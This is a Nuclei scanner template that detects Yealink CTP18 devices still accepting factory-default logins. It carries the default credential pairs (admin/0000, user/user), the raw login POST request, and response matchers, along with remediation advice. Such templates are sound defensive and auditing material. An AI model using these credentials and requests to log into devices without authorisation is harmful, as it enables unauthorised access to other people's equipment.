漏洞描述
Yealink CTP18 Default Administrator Credentials Discovered.
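# Nuclei template: checks whether a Yealink CTP18 still accepts its
# factory-default administrator/user credentials.
# NOTE(review): the trailing "# digest:" comment signs the upstream copy of
# this template; any edit (including re-indentation) requires re-signing.
id: yealink-default-login

info:
  name: Yealink CTP18 - Default Login
  author: parzival,arbenn@pretera.com
  severity: high
  description: |
    Yealink CTP18 Default Administrator Credentials Discovered.
  remediation: |
    Change the factory-default administrator and user passwords and restrict
    network access to the device's management interface.
  reference:
    - https://support.yealink.com
  classification:
    # Use of Default Credentials
    cwe-id: CWE-1392
  metadata:
    verified: true
    # pitchfork pairs the two-entry username and password lists positionally,
    # so the template issues two requests, not one.
    max-request: 2
    fofa-query: Yealink CTP18
  tags: default-login,yealink,vuln

http:
  # Raw request: the blank line after the headers terminates them; the
  # URL-encoded form body follows.
  - raw:
      - |
        POST /api/auth/login?p=Login&t=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: application/json, text/plain, */*

        username={{username}}&pwd={{password}}

    # pitchfork: admin/0000 and user/user are tried as two fixed pairs.
    attack: pitchfork
    payloads:
      username:
        - admin
        - user
      password:
        # quoted so the value stays the string "0000", not the integer 0
        - '0000'
        - user

    host-redirects: true
    # All three matchers must hold for a finding: a success body, the
    # observed response content type, and a 200 status.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"ret":"ok","data":true}'
          - '{"ret":"ok","data":"ok"}'
        condition: or

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200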
# digest: 490a004630440220318d054afb3340844a5206a9372fc759e7405e4518f7c0d2f1c95f36e35ed350022035953a9a4171eff1f8a2afc1b5e9b61ea384c3609eb0f95a6038ae8020ce430e:922c64590222798bb761d5b6d8e72950